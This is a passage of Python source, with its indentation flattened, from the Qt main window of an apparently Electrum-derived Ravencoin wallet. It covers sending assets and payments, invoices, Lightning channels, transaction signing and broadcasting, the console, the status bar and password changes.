self.config.set_key('warn_asset_non_reissuable', False)
if goto:
return True
else:
return False
else:
return True
if not show_small_association_warning():
return
if not show_non_reissuable_warning():
return
norm, new, change_addr = self.create_workspace.get_output()
self.pay_onchain_dialog(
self.get_coins(asset=self.create_workspace.get_owner()),
norm,
coinbase_outputs=new,
#change_addr=change_addr
)
self.create_workspace.reset_workspace()
def get_asset_from_spend_tab(self) -> Optional[str]:
combo_index = self.to_send_combo.currentIndex()
if combo_index != 0:
return self.send_options[combo_index]
return None
def spend_max(self):
if run_hook('abort_send', self):
return
asset = self.get_asset_from_spend_tab()
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(asset=asset),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
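# run_hook may report an extra fee taken by a plugin (e.g. the 2fa service); subtract it so the displayed max reflects what is actually spendable.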
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - RavenValue(x_fee_amount)
assets = amount_after_all_fees.assets
if len(assets) == 0:
to_show = amount_after_all_fees.rvn_value.value
else:
__, v = list(assets.items())[0]
to_show = v.value
self.amount_e.setAmount(to_show)
# show tooltip explaining max amount
mining_fee = tx.get_fee()
mining_fee_str = self.format_amount_and_units(mining_fee.rvn_value.value)
msg = _("Mining fee: {} (can be adjusted on next screen)").format(mining_fee_str)
if x_fee_amount:
twofactor_fee_str = self.format_amount_and_units(x_fee_amount)
msg += "\n" + _("2fa fee: {} (for the next batch of transactions)").format(twofactor_fee_str)
frozen_bal = self.get_frozen_balance_str()
if frozen_bal:
msg += "\n" + _("Some coins are frozen: {} (can be unfrozen in the Addresses or in the Coins tab)").format(
frozen_bal)
QToolTip.showText(self.max_button.mapToGlobal(QPoint(0, 0)), msg)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Ravencoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx + 1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(
self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
try:
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
pubkey_msg = self.pubkey_e.text()
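# Optional OP_RETURN message: append a zero-value output whose script is 0x6a (OP_RETURN), a one-byte push length, and the ASCII message.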
if pubkey_msg != '' and len(pubkey_msg) < 40:
outputs.append(
PartialTxOutput(
value=0,
scriptpubkey=
b'\x6a' +
len(pubkey_msg).to_bytes(1, 'big', signed=False) +
pubkey_msg.encode('ascii')
))
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
except InvoiceError as e:
self.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
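# If the invoice carries asset amounts, spend from coins of the first listed asset; otherwise spend plain RVN.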
l = list(invoice.get_amount_sat().assets.keys())
a = l[0] if l else None
self.pay_onchain_dialog(self.get_coins(asset=a), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, asset: str = None, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only, asset=asset)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_str = self.get_frozen_balance_str()
if frozen_str:
text += " ({} {})".format(
frozen_str, _("are frozen")
)
return text
# TODO: Currently only for ravencoin
def get_frozen_balance_str(self) -> Optional[str]:
frozen_bal = sum(self.wallet.get_frozen_balance(), RavenValue())
if not frozen_bal:
return None
return self.format_amount_and_units(frozen_bal.rvn_value)
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None,
coinbase_outputs=None,
change_addr=None,
mixed=False) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep,
coinbase_outputs=coinbase_outputs,
change_addr=change_addr)
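# Total requested value: asset outputs contribute to their asset's tally, plain outputs to the RVN tally.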
output_value = \
sum([RavenValue(0, {x.asset: x.value}) if x.asset else RavenValue(x.value) for x in outputs +
(coinbase_outputs if coinbase_outputs else [])], RavenValue())
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value,
mixed=mixed)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs, mixed=mixed)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value,
mixed=mixed)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password, mixed=False):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs, mixed=mixed)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None, mixed=False):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
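# A plugin hook (e.g. the 2fa co-signing service) may wrap the success callback before signing proceeds.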
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
def sign(tx, external_keypairs, password):
if external_keypairs:
# can sign directly
tx.sign(external_keypairs)
if not external_keypairs or mixed:
self.wallet.sign_transaction(tx, password)
task = partial(sign, tx, external_keypairs, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
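# BIP70 flow: notify the merchant of the payment and wait up to 20 seconds for a payment ACK.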
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
if self.wallet.lnworker.has_conflicting_backup_with(node_id):
msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
if not self.question(msg):
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_('Your wallet backup has been updated in {}').format(backup_dir))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
self.to_send_combo.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_ln_invoice(self, invoice: str):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.show_error(_("Error parsing Lightning invoice") + f":\n{e}")
return
self.payto_e.lightning_invoice = invoice
pubkey = bh2u(lnaddr.pubkey.serialize())
for k, v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
# self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def set_bip21(self, text: str):
try:
out = util.parse_URI(text, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
def pay_to_URI(self, text: str):
if not text:
return
# first interpret as lightning invoice
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_bip21(text)
# update fiat amount
self.amount_e.textEdited.emit("")
self.show_send_tab()
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
# vbox.setContentsMargins(0, 0, 0, 0)
# vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', True))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
#amount_str = self.format_amount(invoice.amount_sat.rvn_value.value) + ' ' + self.base_unit()
amount_str = repr(invoice.amount_sat)
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(
map(lambda x: str(x.address) + ' : ' + self.format_amount(x.value) + (self.base_unit() if not x.asset else (' ' + x.asset)), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d), ))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': ravencoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
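# Bind each Commands method so console calls run against this window's wallet and can prompt for the password.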
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0] == '_' or m in ['network', 'wallet', 'config', 'daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.status_label = QLabel("")
self.status_label.setAlignment(Qt.AlignRight | Qt.AlignVCenter)
self.status_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addPermanentWidget(self.status_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"),
self.gui_object.show_lightning_dialog)
sb.addPermanentWidget(self.lightning_button)
self.update_lightning_icon()
self.status_button = None
if self.network:
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"),
self.gui_object.show_network_dialog)
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
# sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _(
'Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
